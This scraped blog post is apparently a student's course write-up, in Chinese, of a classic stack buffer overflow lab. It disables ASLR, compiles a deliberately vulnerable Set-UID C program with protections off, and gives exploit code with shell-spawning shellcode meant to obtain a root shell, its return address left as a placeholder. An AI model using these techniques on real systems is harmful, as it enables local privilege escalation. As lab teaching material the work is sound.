2. 程式人生 > >2017-2018-2 20179225 《網絡攻防與實踐》 第10周作業

2017-2018-2 20179225 《網絡攻防與實踐》 第10周作業

阿新 發佈:2018-05-13
his 設計 導致 rcp xpl $0 及其 program with

緩沖區溢出漏洞實驗

1 實驗簡介

緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩沖器和返回地址的暫時關閉,溢出會引起返回地址被重寫。

2 實驗準備

系統用戶名shiyanlou
實驗樓提供的是64位Ubuntu linux,而本次實驗為了方便觀察匯編語句,我們需要在32位環境下作操作,因此實驗之前需要做一些準備

2.1 安裝一些用於編譯32位C程序的東西

輸入以下命令

sudo apt-get update
sudo apt-get install lib32z1 libc6-dev-i386
sudo apt-get install lib32readline-gplv2-dev

技術分享圖片

技術分享圖片

技術分享圖片

2.2 輸入命令linux32進入32位linux環境。

此時你會發現,命令行用起來沒那麽爽了,比如不能tab補全了,所以輸入/bin/bash使用bash:
技術分享圖片

3 實驗步驟

3.1 初始設置

Ubuntu和其他一些Linux系統中,使用地址空間隨機化來隨機堆(heap)和棧(stack)的初始地址,這使得猜測準確的內存地址變得十分困難,而猜測內存地址是緩沖區溢出攻擊的關鍵。因此本次實驗中,我們使用以下命令sudo sysctl -w kernel.randomize_va_space=0關閉這一功能

技術分享圖片

此外,為了進一步防範緩沖區溢出攻擊及其它利用shell程序的攻擊,許多shell程序在被調用時自動放棄它們的特權。因此,即使你能欺騙一個Set-UID程序調用一個shell,也不能在這個shell中保持root權限,這個防護措施在/bin/bash中實現。
linux系統中,/bin/sh實際是指向/bin/bash或/bin/dash的一個符號鏈接。為了重現這一防護措施被實現之前的情形,我們使用另一個shell程序(zsh)代替/bin/bash。下面的指令描述了如何設置zsh程序:

sudo su
cd /bin
rm sh
ln -s zsh sh
exit

技術分享圖片

3.2 shellcode

一般情況下,緩沖區溢出會造成程序崩潰,在程序中,溢出的數據覆蓋了返回地址。而如果覆蓋返回地址的數據是另一個地址,那麽程序就會跳轉到該地址,如果該地址存放的是一段精心設計的代碼用於實現其他功能,這段代碼就是shellcode。

#include <stdio.h>
int main( ) {
char *name[2];
name[0] = ‘‘/bin/sh’’;
name[1] = NULL;
execve(name[0], name, NULL);
}

3.3 漏洞程序

把以下代碼保存為“stack.c”文件,保存到 /tmp 目錄下。代碼如下

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
char buffer[12];

/* The following statement has a buffer overflow problem */
strcpy(buffer, str);

return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}

技術分享圖片

編譯該程序,並設置SET-UID。命令如下:

sudo su
gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
chmod u+s stack
exit

技術分享圖片

GCC編譯器有一種棧保護機制來阻止緩沖區溢出,所以我們在編譯代碼時需要用 –fno-stack-protector 關閉這種機制。
而 -z execstack 用於允許執行棧

3.4 攻擊程序

我們的目的是攻擊剛才的漏洞程序,並通過攻擊獲得root權限。
把以下代碼保存為“exploit.c”文件,保存到 /tmp 目錄下。代碼如下:

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=

"\x31\xc0"    //xorl %eax,%eax
"\x50"        //pushl %eax
"\x68""//sh"  //pushl $0x68732f2f
"\x68""/bin"  //pushl $0x6e69622f
"\x89\xe3"    //movl %esp,%ebx
"\x50"        //pushl %eax
"\x53"        //pushl %ebx
"\x89\xe1"    //movl %esp,%ecx
"\x99"        //cdq
"\xb0\x0b"    //movb $0x0b,%al
"\xcd\x80"    //int $0x80
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);

/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

技術分享圖片

現在我們要得到shellcode在內存中的地址,輸入命令:

gdb stack
disass main

技術分享圖片

技術分享圖片

技術分享圖片

上面的代碼,“\x??\x??\x??\x??”處需要添上shellcode保存在內存中的地址,因為發生溢出後這個位置剛好可以覆蓋返回地址。
而 strcpy(buffer+100,shellcode); 這一句又告訴我們,shellcode保存在 buffer+100 的位置。
技術分享圖片

然後,編譯exploit.c程序:
技術分享圖片

3.5 攻擊結果
先運行攻擊程序exploit,再運行漏洞程序stack,觀察結果:
技術分享圖片

體會

經過修改終於完成,但是依然不知道在kali上出現了什麽錯誤導致一直段錯誤
此次實驗遇到的問題有:

  1. 執行./exploit.c時顯示沒有權限,使用命令chmod a+x exploit.c獲得執行權限。
  2. 出現段錯誤,重新計算shellcode地址。

2017-2018-2 20179225 《網絡攻防與實踐》 第10周作業

相關推薦

2017-2018》《攻防技術》作業

超鏈接 kit ctr 外部命令 下一步 檢查 加密 magictree 系統 教材學習總結 本周主要學習了《網絡攻防---技術與實踐》第9、10章的內容,主要學習了 惡意代碼攻防 與軟件安全攻防 惡意代碼安全攻防 1.基礎知識 惡意代碼是指使計算機按照攻擊者的意圖執行以達

2017-2018-2攻防實踐作業

OS nessus wps 掃描方式 for 探測 window keyword bash 第三周作業: 第一節:第三章學習: 1.1網絡信息收集 網絡信息收集的目的是盡可能了解目標,這包括目標的漏洞IP地址範圍,外部網絡闊樸結構等。 1.2網絡信息收集方法

2017-2018-2 20179207 《攻防技術》作業

baidu mar solar 基於 釣魚 綜合 暴力枚舉 網絡 網站搭建 kali漏洞分析之數據庫評估(一)(二) web層與數據庫連接的漏洞在安全測試中並不少見,owasp曾經的top之首sql註入漏洞。 數據庫評估軟件 1.bbqsql 是一個pyth編寫的盲註工具,

2017-2018-2 20179202《攻防技術》作業

line gre 調試工具 soft cookie值 監聽端口 reflect 寫實 搜索 漏洞分析之數據庫評估(一) BBQSQL 一種用Pyhthon寫的SQL盲註框架。當發動QL註入漏洞攻擊時,它將非常有用。BBQSQL是半自動工具,允許許多難以觸發的SQL註入變

2017-2018-2 20179305《攻防技術》作業

擴展 屏幕 代碼 防火 組成 管理系 引導 分享圖片 功能 教材學習 windows系統架構 Windows操作系統內核的基本模塊 Windows執行體 Windows內核體 設備驅動程序 硬件抽象層 Windows窗口與圖形界面接口內核實現代碼 系統支持進程 環境子系統

2017-2018-2 20179207 《攻防技術》作業

其中 api 關閉 授權 -c 現狀 srm 安全模型 體系 kali視頻(26-31)(漏洞利用) 漏洞利用之檢索與利用 漏洞利用工具集 1.searchsploit Exploit Database->searchsploit 2.pattern crea

2017-2018-2 20179223《攻防技術》作業

iptable amba sudo 用戶認證 方案 shel linu 搜索 選擇 網絡攻防環境的搭建與測試 網絡攻防環境的搭建與測試主要包括四臺虛擬機(windows攻擊機和靶機、Linux攻擊機和靶機),均采用NAT模式,將虛擬機ip地址設置為同一個網段,Linux攻擊

2017-2018-2 20179202《攻防技術》作業

屏幕 全部 程序 後門 嘗試 htm 外部命令 無線 定義 壓力測試 Kali下壓力測試攻擊包括VoIP壓力測試、WEB壓力測試、網絡壓力測試及無線壓力測試四個分類。 Voip壓力測試 包括iaxflood和inviteflood。 WEB壓力測試工具 THC-

2017-2018攻防技術》作業

rand 技術分享 and 死機 令行 chmod u+s -o 命令 緩沖區溢出 緩沖區溢出攻防研究 Linux 緩沖區溢出 原理 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏

2017-2018-2 20179225攻防實踐10作業

his 設計 導致 rcp xpl $0 及其 program with 緩沖區溢出漏洞實驗 1 實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩沖器和

2017-2018-2 20179225攻防實踐13作業

內容 scan 使用 基礎問題 定位 數字 和我 ron 依然 實踐內容 (1)理解免殺技術原理 (2)正確使用msf編碼器,veil-evasion,自己利用shellcode編程等免殺工具或技巧; (成功實現了免殺的。如何做成功的簡單語言描述即可,不要截圖、指令。與殺軟

2017-2018-2 20179216 《攻防實踐總結

通過 advance 會話 輕量級 兩個 構造 點擊 審計 添加 教材內容總結 1. Web應用程序體系結構 Web應用程序是一種使用瀏覽器在互聯網或企業內部網上進行訪問操作的應用軟件形態。Web應用體系有瀏覽器作為客戶端完成數據顯示和展示內容的渲染;由功能強大的服務器完

2017-2018-2 20179216 《攻防實踐總結

rsh 支持 紅色 網絡 擴展庫 屏幕 scrip 完整 custom 教材內容總結 第七章 Windows操作系統安全攻防 1、Windows操作系統基本框架 Windows操作系統的基本結構 分為運行於處理器特權模式的操作系統內核,以及運行在處理器非特權模式的用戶空

2017-2018-2 20179216 《攻防實踐作業

adl code tab 安裝 困難 即使 得到 版本 內存地址 緩沖區溢出漏洞實驗 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩沖器和返回地

對抗技術 2017-2018-2 20152515 Exp2 後門原理實踐

技術分享 cnblogs 利用 mage 可選 任務計劃 攝像頭 寫入 提權 1.實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (0.5分) (2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) (3)使用MSF meterp

2017-2018-2對抗技術》 20155322 Exp4 惡意代碼分析

msfvenom 密鑰對 想要 ipv 執行 接收 .net 數據 ref [-= 博客目錄 =-] 1-實踐目標 1.1-實踐介紹 1.2-實踐內容 1.3-實踐要求 2-實踐過程 2.1-Mac下網絡監控 2.2-Windows下網絡監控 2.3-Mac下惡意

2017-2018-2對抗技術》 20155322 Exp 5 MSF基礎應用

load tab 其他 obj lis 測試 可能 cte 信息 [-= 博客目錄 =-] 1-實踐目標 1.1-實踐介紹 1.2-實踐內容 1.3-實踐要求 2-實踐過程 2.1-情報收集 2.2-主動攻擊實踐-ms08_067 2.3-瀏覽器攻擊實踐-many

2017-2018-2 20179207 《攻防技術》四周作業

tcp 打開 lists 跨站 網絡流 webdav 攻防 內容 arp欺騙 網絡嗅探與協議分析 基礎內容 1.網絡嗅探Sniff 網絡監聽、網絡竊聽 類似於傳統的電話線竊聽 網絡嗅探技術定義:利用計算機網絡接口截獲目的地為其他計算機的數據報文 ,監聽網絡流中所包含的用

2017-2018-2 20179305《攻防技術》十一作業

variable rep 錯誤 表單 程序設計 query inter 目的 date SQL註入實驗 實驗介紹 在本次實驗中,我們修改 phpBB的web應用程序,並且關閉了phpBB實現的一些對抗SQL註入的功能。因而我們創建了一個可以被SQL註入的phpBB版本。盡管

2017-2018-2 20179305《攻防技術》 十一作業

其中 存儲空間 lec 計算機 系統 搜索 以及 研究 弱點 研究緩沖區溢出的原理,至少針對兩種數據庫進行差異化研究 緩沖區溢出是指當計算機向緩沖區內填充數據位數時,超過了緩沖區本身的容量,溢出的數據覆蓋在合法數據上,理想的情況是程序檢查數據長度並不允許輸入超過緩沖區長度的